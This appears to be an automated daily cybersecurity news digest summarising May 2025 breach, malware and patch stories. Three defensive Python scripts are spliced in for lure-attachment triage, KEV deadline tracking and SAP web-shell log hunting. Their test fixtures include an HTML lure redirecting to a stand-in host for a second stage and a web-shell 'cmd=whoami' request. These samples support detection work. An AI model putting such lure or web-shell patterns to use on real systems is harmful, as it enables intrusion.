Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 12778
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-05-14 13:40:40 | bleepingcomputer | DATA BREACH | Dior Announces Cybersecurity Breach Affecting Customer Data | Dior disclosed a cyberattack that compromised customer information from their Fashion and Accessories segments.
The breach was identified on May 7. Passwords and payment details were not exposed because they are stored separately from the affected data.
Personal contact details, purchase history, and preferences are among the data exposed.
Customers from Korea and China have been specifically notified, suggesting the breach had a significant regional impact.
Dior has engaged top cybersecurity experts to further investigate and mitigate the incident.
The brand is contacting regulators and impacted customers following legal requirements.
Dior advises customers to stay alert for potential phishing scams that may impersonate the brand.
The breach has led to some legal scrutiny in Korea regarding timely notifications to authorities. | Details |
| 2025-05-14 13:27:19 | bleepingcomputer | CYBERCRIME | Kosovo Extradites BlackDB Marketplace Leader on US Cybercrime Charges | Kosovo has extradited Liridon Masurica, the administrator of the BlackDB cybercrime marketplace, to the United States to face multiple cybercrime charges.
Masurica was arrested by Kosovar authorities on December 14th, 2024, and extradited on May 9th, after being active in cybercrime since 2018.
He appeared before United States Magistrate Judge Lindsay Saxe Griffin and faces five counts of using unauthorized access devices and one count of conspiracy.
BlackDB.cc sold stolen credit card data, server credentials, and personal information, primarily affecting U.S. citizens.
Purchasers of this data reportedly engaged in credit card fraud, tax fraud, and identity theft.
The FBI collaborated closely with Kosovo Police's Cybercrime Investigation Directorate and received additional support from the FBI’s Legal Attaché Office in Sofia and the Department of Justice's Office of International Affairs.
Following related investigations, law enforcement recently seized the Rydox cybercrime marketplace and arrested its three Kosovo administrators.
If convicted on all counts, Masurica could face up to 55 years in federal prison. | Details |
| 2025-05-14 12:28:32 | theregister | MISCELLANEOUS | Gartner Expert Challenges Current Practices in Cybersecurity Patching | Craig Lawson, Research Vice President at Gartner, advised against rushing to apply patches from Patch Tuesday, suggesting it doesn't necessarily lower risk.
During a conference, Lawson highlighted that no large organization he spoke with, including hyperscalers and government agencies, has successfully kept up with all necessary security patches.
Lawson introduced the concept of "threat debt," which is the accumulation of known but unaddressed security vulnerabilities. He argued that speeding up patching processes isn't an effective solution.
He emphasized that only a small percentage (8-9%) of vulnerabilities are actually exploited by cybercriminals, and these often aren't the ones deemed critical.
The analyst mentioned that patches can sometimes cause more issues, either by breaking systems or being too complex to implement effectively.
Lawson suggested organizations should develop a "cohabitation metric" to assess how well they can manage with unpatched systems by implementing compensating controls.
He advocated for a more tailored approach to patching, based on specific organizational needs and the practicality of implementing certain patches, encouraging cross-departmental collaboration. | Details |
| 2025-05-14 11:16:37 | thehackernews | NATION STATE ACTIVITY | Earth Ammit Targets Drone Supply Chain in Sophisticated Cyber Espionage | Earth Ammit, believed to be linked to Chinese-speaking nation-state groups, conducted espionage against military, satellite and other sectors in Taiwan and South Korea during 2023 and 2024.
The VENOM campaign targeted software service providers, exploiting web server vulnerabilities to plant web shells, then deploying remote-access tools and harvesting credentials.
TIDRONE campaign, revealed by Trend Micro, utilized custom malware like CXCLNT and CLNTEND to attack drone manufacturers and military industries.
Both campaigns abused trusted upstream relationships, including ERP software, to reach the drone supply chain, and used trusted communication tools to distribute malware.
The attackers used a combination of open-source tools and bespoke malware to obscure their activities and facilitate staged intrusions.
Shared victims, service providers, and command-and-control infrastructures indicate a coordinated effort between the VENOM and TIDRONE campaigns.
Trend Micro associated the tactics, techniques, and procedures of Earth Ammit with another Chinese hacking group, suggesting a shared toolkit and strategic approach. | Details |
| 2025-05-14 10:44:05 | thehackernews | MALWARE | Horabot Malware Phishing Attack Targets Users in Six Latin American Countries | Cybersecurity experts have uncovered a new phishing campaign distributing Horabot malware across six Latin American nations targeting Windows users.
Malicious emails impersonating invoices or financial documents are used to trick users into opening attachments that compromise email credentials, contact lists, and install banking trojans.
The malware conducts extensive activities, including system reconnaissance and credential theft using VBScript, AutoIt, and PowerShell scripts.
Horabot was first identified in 2023 and is believed to be operated by a Brazilian threat actor, focusing on Spanish-speaking users since November 2020.
The phishing chain starts with a deceptive email carrying a ZIP file that masquerades as a PDF but actually holds a malicious HTML file, which leads to further malware downloads.
Once the system is infected, the malware steals data from multiple browsers and displays fake pop-ups to capture more user login details.
The malware terminates itself if Avast antivirus is present or if it is running in a virtual environment, which hinders analysis and detection.
Following infection, the malware also leverages compromised systems to propagate phishing emails through Outlook, perpetuating the cycle of infection. | Details |
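The lure described in this item (a ZIP that claims to contain a PDF but really carries an HTML file) is a shape mail gateways can check for before a user ever opens the attachment. The following script is an added example, not code from the article or from any vendor; its heuristics are generic (double extensions, active file types, magic-byte mismatch, HTML bodies under document names, right-to-left override characters, password-protected entries) and the sample archive it builds is constructed for the demonstration, with made-up file names rather than real campaign artifacts.

```python
"""Triage a mail-attachment ZIP for the lure shape described above: an
archive entry that claims to be a document (e.g. a PDF) but carries HTML
or another active file type. Generic heuristics, not campaign signatures."""
import io
import zipfile

# File types a recipient expects to be inert when opened
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
# File types that run or render active content when opened on Windows
ACTIVE_EXTS = {"html", "htm", "hta", "js", "jse", "vbs", "vbe", "wsf",
               "lnk", "exe", "scr", "cmd", "bat", "ps1"}
# Leading bytes a genuine file of the declared type must start with
MAGIC = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "docx": (b"PK\x03\x04",),
    "xlsx": (b"PK\x03\x04",),
}
HTML_MARKERS = (b"<html", b"<!doctype html", b"<script", b"<iframe")
RTL_OVERRIDE = "\u202e"  # hides the real extension in a file browser


def entry_findings(name, head):
    """Return the reasons (possibly none) that one archive entry looks like a lure.

    name: entry name as stored in the ZIP; head: its first few hundred bytes.
    """
    reasons = []
    base = name.rsplit("/", 1)[-1]
    if RTL_OVERRIDE in base:
        reasons.append("right-to-left override in file name")
    exts = base.lower().split(".")[1:]
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and exts[-1] in ACTIVE_EXTS:
        reasons.append(f"double extension .{exts[-2]}.{exts[-1]}")
    if exts and exts[-1] in ACTIVE_EXTS:
        reasons.append(f"active content type .{exts[-1]}")
    if exts and exts[-1] in MAGIC and not head.startswith(MAGIC[exts[-1]]):
        reasons.append(f"declared .{exts[-1]} but magic bytes do not match")
    lowered = head.lstrip().lower()
    if any(m in lowered for m in HTML_MARKERS) and (not exts or exts[-1] not in ("html", "htm")):
        reasons.append("content is HTML despite non-HTML name")
    return reasons


def triage_zip(data):
    """Inspect every file entry of a ZIP held in memory; return {name: reasons}."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.flag_bits & 0x1:  # encrypted entry: a common lure, content cannot be inspected
                findings[info.filename] = ["password-protected entry, content not inspectable"]
                continue
            with zf.open(info) as fh:
                head = fh.read(512)  # magic bytes and HTML markers sit at the top
            reasons = entry_findings(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_zip():
    """Constructed sample archive: one lure entry and one benign PDF (not real campaign files)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Factura_4411.pdf.html",
                    "<html><script>location='http://example.invalid/stage2'</script></html>")
        zf.writestr("Recibo_4411.pdf", b"%PDF-1.4\n% constructed placeholder, not a real document\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in triage_zip(build_sample_zip()).items():
        print(name, "->", "; ".join(reasons))
```

Only the first 512 bytes of each entry are read, so a large or nested archive does not have to be fully decompressed to be classified; a hit on any rule is enough to quarantine the message for analyst review rather than deliver it.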
| 2025-05-14 10:34:08 | thehackernews | MISCELLANEOUS | The Strategic Advantages of Offensive Security Training | Verizon's 2025 Data Breach Investigations Report indicates an 18% year-over-year increase in confirmed data breaches, with exploitation techniques rising by 34%.
Many organizations are responding to the increase in cyberattacks by investing in both security tools and compliance standards, although these alone are not sufficient to fully mitigate cyber risks.
The article argues that effective security depends on offensive security training across all roles on a security team, so that staff understand and can anticipate attacker behaviors and strategies.
This training empowers non-offensive roles such as new practitioners, incident handlers, forensic analysts, and security managers with insights into how attackers operate, enhancing their effectiveness in their respective positions.
Hands-on offensive operations training allows security professionals to gain practical experience with common attack methods, enhancing their ability to identify risks, prioritize responses, and improve overall security strategies.
Security managers benefit significantly from understanding offensive techniques, aiding them in better strategic decision-making and risk management.
Ultimately, continuous learning and adaptation to new cybersecurity challenges through such training can strengthen an organization's defensive posture significantly. | Details |
| 2025-05-14 09:33:34 | theregister | CYBERCRIME | Urgent Need to Secure AI Systems Against Cyber Threats | Peter Garraghan, speaking at the CYBERUK conference, highlighted the lack of security awareness in organizations' AI deployments.
A recent NCSC report warns that, if not properly secured, AI systems will widen the attack surface of critical systems by 2027.
AI deployment is often prioritized for competitive market share over implementing necessary security measures.
The report identifies prompt injection and software supply chain attacks as major threats to AI systems.
Garraghan’s firm exploited vulnerabilities in a candle shop’s AI chatbot, demonstrating potential severe risks.
The NCSC emphasized the importance of incorporating cybersecurity in AI to mitigate risks of advanced cyberattacks.
Current AI deployments could potentially expose organizations to data theft and other cyber exploitations if not managed correctly.
The NCSC continues to develop guidance for organizations to strengthen cybersecurity in the era of AI advancements. | Details |
| 2025-05-14 08:17:50 | thehackernews | NATION STATE ACTIVITY | Microsoft Patches Critical Flaws Under Active Exploitation | Microsoft issued updates for 78 security flaws, 11 of which are critical.
Five zero-day vulnerabilities were actively exploited, prompting immediate patches.
Patches cover various issues including remote code execution and privilege escalation.
Notable among the fixes is CVE-2025-29813, a critical bug in Azure DevOps Server with a CVSS score of 10.0.
The exploited flaws sit in the Microsoft Scripting Engine, the DWM Core Library, the Common Log File System driver and the Ancillary Function Driver for WinSock.
CISA has mandated federal agencies to apply these fixes by June 3, 2025, highlighting the severity.
Microsoft also fixed security flaws in products like Edge, and other vendors released patches for additional vulnerabilities.
Several of the fixed flaws allow privilege escalation or data theft over the network, which argues for prioritizing them in patch rollouts. | Details |
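The CISA deadline mentioned in this item is the kind of date a patch-management team wants computed automatically against its own list of still-unpatched CVEs. The script below is an added example, not code from the article or from CISA; `SAMPLE_KEV` is a constructed excerpt in the shape of CISA's public KEV JSON feed (the field names `cveID`, `vendorProject`, `product`, `dateAdded` and `dueDate` are the feed's own), and its entries reflect the May 2025 catalog additions as the author understands them, so they should be verified against the live feed before use.

```python
"""Check which CVEs on a local "still unpatched" list carry a CISA KEV
remediation deadline and how close it is. Added example; SAMPLE_KEV is a
constructed excerpt in the shape of the public KEV JSON feed."""
import json
from datetime import date

SAMPLE_KEV = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2025-30397", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2025-05-13", "dueDate": "2025-06-03"},
    {"cveID": "CVE-2025-30400", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2025-05-13", "dueDate": "2025-06-03"},
    {"cveID": "CVE-2025-32701", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2025-05-13", "dueDate": "2025-06-03"},
    {"cveID": "CVE-2025-32706", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2025-05-13", "dueDate": "2025-06-03"},
    {"cveID": "CVE-2025-32709", "vendorProject": "Microsoft", "product": "Windows",
     "dateAdded": "2025-05-13", "dueDate": "2025-06-03"},
    {"cveID": "CVE-2025-31324", "vendorProject": "SAP", "product": "NetWeaver",
     "dateAdded": "2025-04-29", "dueDate": "2025-05-20"},
]})


def load_deadlines(kev_json):
    """Map cveID -> (vendor/product label, dueDate) from a KEV feed document."""
    out = {}
    for v in json.loads(kev_json)["vulnerabilities"]:
        label = f'{v["vendorProject"]} {v["product"]}'
        out[v["cveID"].upper()] = (label, date.fromisoformat(v["dueDate"]))
    return out


def kev_status(kev_json, unpatched, today, warn_days=7):
    """Classify each unpatched CVE as overdue, due_soon, scheduled or not_in_kev.

    Returns (cveID, state, days_left or None, product or None) tuples,
    sorted so the most urgent items come first.
    """
    deadlines = load_deadlines(kev_json)
    rows = []
    for cve in unpatched:
        cve = cve.upper()
        if cve not in deadlines:
            rows.append((cve, "not_in_kev", None, None))
            continue
        product, due = deadlines[cve]
        days_left = (due - today).days  # negative once the deadline has passed
        if days_left < 0:
            state = "overdue"
        elif days_left <= warn_days:
            state = "due_soon"
        else:
            state = "scheduled"
        rows.append((cve, state, days_left, product))
    order = {"overdue": 0, "due_soon": 1, "scheduled": 2, "not_in_kev": 3}
    rows.sort(key=lambda r: (order[r[1]], r[2] if r[2] is not None else 10**6, r[0]))
    return rows


if __name__ == "__main__":
    # Hypothetical unpatched list: three KEV entries plus one CVE from the same
    # Patch Tuesday that is not in the catalog.
    todo = ["CVE-2025-31324", "CVE-2025-30397", "CVE-2025-30400", "CVE-2025-29813"]
    for cve, state, days, product in kev_status(SAMPLE_KEV, todo, date(2025, 5, 14)):
        print(f"{cve:16} {state:11} {'' if days is None else days:>4} {product or ''}")
```

A CVE absent from the catalog is not safe to ignore (the catalog only lists confirmed exploitation), so `not_in_kev` is a sorting bucket, not a dismissal; the `warn_days` window is the lead time a change window needs, and should be set to match the organization's own patch cadence.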
| 2025-05-14 06:40:06 | theregister | RANSOMWARE | Ransomware Targets Critical In-Between IT and OT Systems | Ransomware attacks are increasingly targeting the intermediary systems between IT and operational technology (OT) in critical infrastructure sectors.
These middle systems are seen as vulnerable spots, less guarded than core IT or heavy industrial OT systems.
Attackers favor these systems because the operational impact and potential safety risks make companies more likely to pay.
One example given is the manipulation of pharmaceutical labeling systems, which could lead to life-threatening errors.
The SANS Institute has identified increased ransomware activities as a significant threat, especially when it involves IT systems related to critical services like healthcare and utilities.
Nation-state actors, notably from Russia, China, and Iran, are also intensively targeting these critical infrastructures for more destructive purposes.
The experts suggest a shift from recovery-focused defenses to early detection strategies to counteract the manipulation of critical systems. | Details |
| 2025-05-14 04:23:17 | thehackernews | CYBERCRIME | Fortinet Fixes Critical Zero-Day Exploited in FortiVoice Systems | Fortinet has addressed a critical zero-day vulnerability, CVE-2025-32756, with a CVSS score of 9.6, affecting multiple products including FortiVoice.
The stack-based overflow vulnerability allows remote unauthenticated attackers to execute arbitrary code via crafted HTTP requests.
The flaw has been actively exploited in attacks specifically targeting FortiVoice enterprise phone systems.
Attackers utilized the vulnerability to perform network scans, erase crash logs, and enable debugging features to intercept credentials.
Products impacted include FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera.
Fortinet's product security team discovered the flaw following suspicious activity from specific IP addresses.
Users are urged to patch affected systems immediately or disable the HTTP/HTTPS administrative interface as a temporary measure if patching is delayed. | Details |
| 2025-05-14 04:06:18 | thehackernews | MALWARE | Ivanti Fixes Critical Vulnerabilities in Endpoint Manager Software | Ivanti has issued updates for two vulnerabilities in its Endpoint Manager Mobile (EPMM) software, an authentication bypass and a code-execution flaw, which can be chained for unauthenticated remote code execution.
These vulnerabilities were linked to two open-source libraries used in EPMM, though the specific libraries weren't disclosed.
A very limited number of customers have reportedly been affected by these exploits, according to Ivanti.
The vulnerabilities affect only the on-premises version of EPMM and not other Ivanti products like Ivanti Neurons for MDM or Ivanti Sentry.
Ivanti recommends that the risk can be significantly mitigated by filtering access to the API via built-in Portal ACLs or an external web application firewall.
Additionally, Ivanti released patches for an unrelated authentication bypass issue in on-premises Neurons for ITSM, which also poses severe risks but has not been exploited.
Users are encouraged to update their Ivanti software instances promptly to prevent potential exploits by threat actors. | Details |
| 2025-05-14 00:47:21 | theregister | MISCELLANEOUS | Global Tech Giants Release Patches for Multiple Security Flaws | Microsoft disclosed five actively exploited vulnerabilities, emphasizing the need for immediate patching across Windows platforms and servers.
Microsoft's Azure platform also drew attention with three notable vulnerabilities addressed, including a critical elevation-of-privilege flaw in Azure DevOps Server.
Adobe released patches targeting critical flaws in multiple applications, such as Photoshop and Illustrator, capable of arbitrary code execution.
Apple's patch round included a fix for an exploited flaw in its watchOS and a broad series of updates across various platforms including iOS, macOS, and Safari, targeting both security improvements and bug fixes.
SAP revealed 18 new fixes, including re-releases for critical vulnerabilities affecting its NetWeaver platform.
Ivanti introduced patches for critical and high-severity vulnerabilities in their products, emphasizing security enhancements for ITSM and Cloud Services Application.
The collective updates underscore a widespread and proactive effort by tech firms to mitigate vulnerabilities amidst rising security threats. | Details |
| 2025-05-13 21:23:59 | theregister | MALWARE | New Exploit Circumvents Intel’s Spectre Defenses, Risks Data Leakage | Researchers from ETH Zurich have identified a new class of vulnerabilities, named Branch Predictor Race Conditions (BPRC), that circumvent Intel's defenses against Spectre vulnerabilities.
The new exploit, called Branch Privilege Injection (BPI), enables unprivileged code to mimic kernel-level branch predictions, effectively bypassing Intel’s Indirect Branch Restricted Speculation and Indirect Branch Predictor Barrier.
This vulnerability affects all Intel x86 processors since the 9th generation and has implications for both individual computers and cloud services by potentially allowing malicious programs to access sensitive data across different security domains.
Intel has released a microcode update to mitigate the newly discovered vulnerabilities; a performance overhead of up to 2.7% was measured with the mitigation in place.
Despite these patches, the fundamental issue related to speculative execution remains a challenge, and vulnerabilities like Spectre are likely to persist as long as this method is used in CPU design.
AMD and Arm chips are reportedly not affected by this specific vulnerability.
Intel encourages users to contact their system manufacturers for the appropriate updates and continues to enhance its hardware mitigations against such speculative execution vulnerabilities. | Details |
| 2025-05-13 20:49:34 | bleepingcomputer | CYBERCRIME | SAP Addresses New Zero-Day Flaw Amid Continued Cyber Attacks | SAP released patches for a newly exploited zero-day vulnerability in its NetWeaver servers.
The patch addresses vulnerabilities discovered during investigations of prior attacks leveraging a different zero-day flaw fixed in April.
Cybersecurity firms linked attacks exploiting these vulnerabilities to a Chinese threat actor and observed significant compromises in Fortune 500 companies.
Attackers used a combination of unauthorized file uploads and insecure deserialization to execute commands remotely on affected systems.
SAP has urged customers to update their systems promptly and monitor any suspicious server activity.
The United States Cybersecurity and Infrastructure Security Agency (CISA) has included the previous flaw in its Known Exploited Vulnerabilities Catalog, requiring federal agencies to secure their systems swiftly.
Over 2,000 SAP NetWeaver servers remain exposed online, leaving them open to further attacks. | Details |
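The item above describes the attack as an unauthorized file upload followed by command execution on the server, and advises monitoring for suspicious server activity. The script below is an added example of what that monitoring can look like at the access-log level; it is not code from SAP or from the article. It assumes an Apache-style common log format (adapt `LOG_RE` to the ICM or web dispatcher log layout actually in use), it keys on the Visual Composer metadata uploader endpoint that public reporting tied to the April upload flaw and through which the May deserialization flaw was also reached, and the log lines in `SAMPLE_LOG` are constructed for the demonstration, with illustrative JSP names rather than real indicators.

```python
"""Hunt an HTTP access log for the two-stage pattern described above:
a POST to the Visual Composer metadata uploader endpoint, followed by
requests from the same client to a JSP under /irj/ (a dropped web shell
being invoked). Added example; log format assumed to be Apache-style
common log format, sample lines constructed."""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Endpoint public reporting tied to the April upload flaw; the May
# deserialization flaw was reached through the same path (assumption for
# your environment: confirm against your own SAP notes and logs).
UPLOADER = "/developmentserver/metadatauploader"
# Constructed sample: two probing hosts and one normal portal user (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [13/May/2025:18:02:11 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 200 212
203.0.113.7 - - [13/May/2025:18:02:15 +0000] "GET /irj/helper.jsp?cmd=whoami HTTP/1.1" 200 41
198.51.100.22 - - [13/May/2025:18:05:40 +0000] "GET /irj/portal HTTP/1.1" 200 5120
192.0.2.9 - - [13/May/2025:18:09:03 +0000] "POST /developmentserver/metadatauploader HTTP/1.1" 403 0
"""


def parse(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["target"].split("?", 1)[0].lower()  # drop the query string
    return rec


def detect(lines):
    """Return (severity, client_ip, message) alerts, grouped by client in order of first sighting."""
    events = defaultdict(list)  # client ip -> ordered list of ("upload" | "jsp", record)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(UPLOADER):
            events[rec["ip"]].append(("upload", rec))
        elif rec["path"].endswith(".jsp") and "/irj/" in rec["path"]:
            events[rec["ip"]].append(("jsp", rec))

    alerts = []
    for ip, seq in events.items():
        for kind, r in seq:
            if kind != "upload":
                continue
            # A 2xx means the servlet accepted the request (unpatched or unfiltered);
            # a 4xx still shows someone probing for the endpoint.
            sev = "high" if 200 <= r["status"] < 300 else "medium"
            alerts.append((sev, ip, f"POST {UPLOADER} returned {r['status']} at {r['ts']}"))
        first_upload = next((i for i, (kind, _) in enumerate(seq) if kind == "upload"), None)
        if first_upload is not None:
            shells = [r["target"] for kind, r in seq[first_upload + 1:] if kind == "jsp"]
            if shells:
                alerts.append(("critical", ip, "JSP invoked after uploader hit: " + ", ".join(shells)))
    return alerts


if __name__ == "__main__":
    for sev, ip, msg in detect(SAMPLE_LOG.splitlines()):
        print(f"[{sev}] {ip}: {msg}")
```

The critical alert requires ordering (the JSP request must come after the uploader POST from the same client), which keeps ordinary portal users who happen to load a JSP out of the result; a 2xx on the uploader POST is itself worth a ticket, because a patched or ACL-protected system should not answer that request with success.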
| 2025-05-13 20:41:25 | theregister | MISCELLANEOUS | Trump's $400M Qatari Jet Gift Raises Security and Ethical Issues | The Trump administration is poised to accept a $400 million luxury Boeing 747-8 from the royal family of Qatar, intended as a temporary Air Force One.
Retrofitting the aircraft to meet U.S. presidential security standards could take years and be extremely costly, potentially interfering with the ongoing program to replace the current VC-25A aircraft.
Security experts question the practicality of adapting a foreign-owned jet, citing massive expenses and the need for advanced security measures such as in-flight refueling capabilities and a fortified hull and windows.
The aircraft is set to be transferred to Trump’s presidential library foundation after his term, raising legal and ethical issues regarding the acceptance of such a valuable gift from a foreign power.
Retrofitting would include intensive inspections and replacements in communications, engines, and security systems to guard against electronic and physical threats.
There are concerns about potential espionage risks, as foreign actors could embed surveillance devices; extensive countermeasures would be required to ensure complete security.
If accepted, the aircraft might not be operational until after Trump's term in office, making the arrangement impractical despite its initial no-cost appeal. | Details |